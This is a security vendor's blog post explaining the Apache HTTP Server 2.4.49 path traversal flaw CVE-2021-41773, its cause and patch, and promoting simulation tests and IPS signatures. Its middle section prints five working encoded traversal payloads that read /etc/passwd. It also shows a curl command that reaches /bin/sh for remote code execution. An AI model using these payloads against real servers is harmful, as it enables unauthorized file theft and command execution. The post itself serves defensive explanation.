Five Ways to Simulate Apache CVE-2021-41773 Exploits

Keep up to date with latest blog posts

Picus Labs has updated the Picus Threat Library with attacks that exploit path traversal and file disclosure vulnerability in Apache HTTP Server. 

What is the CVE-2021-41773 Vulnerability?

Apache has published a security advisory for the CVE-2021-41773 path traversal vulnerability on October 5, 2021. Although the history of this type of path traversal vulnerabilities is ancient (e.g., CVE-1999-0253), unfortunately, we still encounter these vulnerabilities even in widely used software such as Apache. Yes, even after 22 years, you can use the same exploit payload of CVE-1999-0253 for CVE-2021-41773.

Why is This Vulnerability Caused?

According to the Apache HTTP Server Project’s advisory,  CVE-2021-41773 vulnerability was discovered in a change to path normalization in Apache HTTP Server version 2.4.49. Because of this change, a path traversal attack could be used to map URLs to files not in the expected document root by sending specially crafted requests to the Apache web server. These requests may succeed if files outside the document root are not protected by "require all denied."

Briefly, because of the change in path normalization mechanism of Apache HTTP Server 2.4.49, it does not properly neutralize sequences such as ".." that can resolve to a location outside of that directory.

Is CVE-2021-41773 a Zero-Day Vulnerability?

No. A zero-day (0-day) vulnerability must be unknown to those concerned about its mitigation (including the vendor) or known and a patch has not been developed. A patch was released for this vulnerability on 2021-10-04 with the update 2.4.50. So, CVE-2021-41773 is a known and patched vulnerability, and definitely, it is not a zero-day.

How do Attackers Exploit the CVE-2021-41773 Vulnerability?

An attacker can use simple malicious HTTP requests to exploit the vulnerability. For example, the following request is sufficient to get the /etc/passwd file:

Payload 1:

http://$host/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

CWE-24 ../file_dir/ pattern (also known as Double Dot) is an infamous CWE-23 Relative Path Traversal pattern that enables attackers to traverse the file system to access files or directories that are outside of the restricted directory.

Our CVE-2021-41773 PoC request include “.%2e/” pattern. Actually, it is same with the “../” (Double Dot) pattern since “%2e” is the URL encoded version of “.” (dot) character. So, URL decoded version of “.%2e/” is “../”.

We can also encode the other %2e/ character to exploit the CVE-2021-41773 vulnerability. So, our payload should be like:

Payload 2:

http://$host/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

It is even possible to exploit this Apache path traversal vulnerability by mixing .%2e/ and %2e%2e/”  patterns:

Payload 3:

http://$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

Our payloads are not limited to the above ones. Firstly, we don’t have to use the /cgi-bin/ directory for exploitation. We can use another existing directory, such as /icons/:

Payload 4:

http://$host/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

I saved the best payload for last. The following URL can be used for remote code execution on a system that runs a vulnerable Apache server.

Payload 5:

http://$host/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh


For example, the below Curl request can be used to run the “id” command:

curl --data "A=|echo;id>" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv

What is the Impact of CVE-2021-41773 Vulnerability?

CVE-2021-41773 allows unauthenticated attackers to execute arbitrary code and disclose sensitive information on vulnerable systems. Since the CVE-2021-41773 vulnerability can be exploited remotely and doesn’t require an admin or privileged account, its severity is critical.

What is the Current Situation?

As also stated by Apache, attackers exploit this vulnerability in the wild. According to Shodan, there are more than 100.000 vulnerable Apache 2.4.49 web servers as of today.

Vulnerable Apache 2.4.49 servers for CVE-2021-41773

How to Protect Your Organization From CVE-2021-41773 exploits?

Apache released a patch for this vulnerability on 2021-10-04 with the update 2.4.50. If you have web servers running Apache 2.4.49, you must update it immediately. 

How Picus Helps Simulate and Prevent CVE-2021-41773  Apache Web Server Exploits?

We also strongly suggest simulating  CVE-2021-41773 exploitation attacks to test the effectiveness of your security controls against such path traversal attacks using the Picus Continuous Security Control Validation Platform. Picus Threat Library includes the following threats for CVE-2021-41773 vulnerability: 

Picus ID

Threat Name

361419

Apache HTTP Server Path Traversal Vulnerability Variant-1

543999

Apache HTTP Server Path Traversal Vulnerability Variant-2

246566

Apache HTTP Server Path Traversal Vulnerability Variant-3

379553

Apache HTTP Server Remote Code Execution Vulnerability Variant-1

Picus Threat Library also contains 100+ path traversal attacks and 2000+ web application attacks as of today.

Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address Apache HTTP Server CVE-2021-41773 and other vulnerability exploitation attacks in preventive security controls.

Currently, we confirmed that the following prevention signatures can be used to protect against CVE-2021-41773  exploits. We will update the list when Picus Labs validate the signatures of other vendors/products.

Security Control

Signature

Signature Name

Snort IPS

2034124

ET EXPLOIT Apache HTTP Server 2.4.49 - Path Traversal Attempt (CVE-2021-41773) M1

Snort IPS

2034125

ET EXPLOIT Apache HTTP Server 2.4.49 - Path Traversal Attempt (CVE-2021-41773) M2

Snort IPS

2034126

ET POLICY Apache HTTP Server 2.4.49 Observed - Vulnerable to CVE-2021-41773

Palo Alto Networks NGFW

30844

HTTP Directory Traversal Request Attempt     

Subscribe

Keep up to date with latest blog posts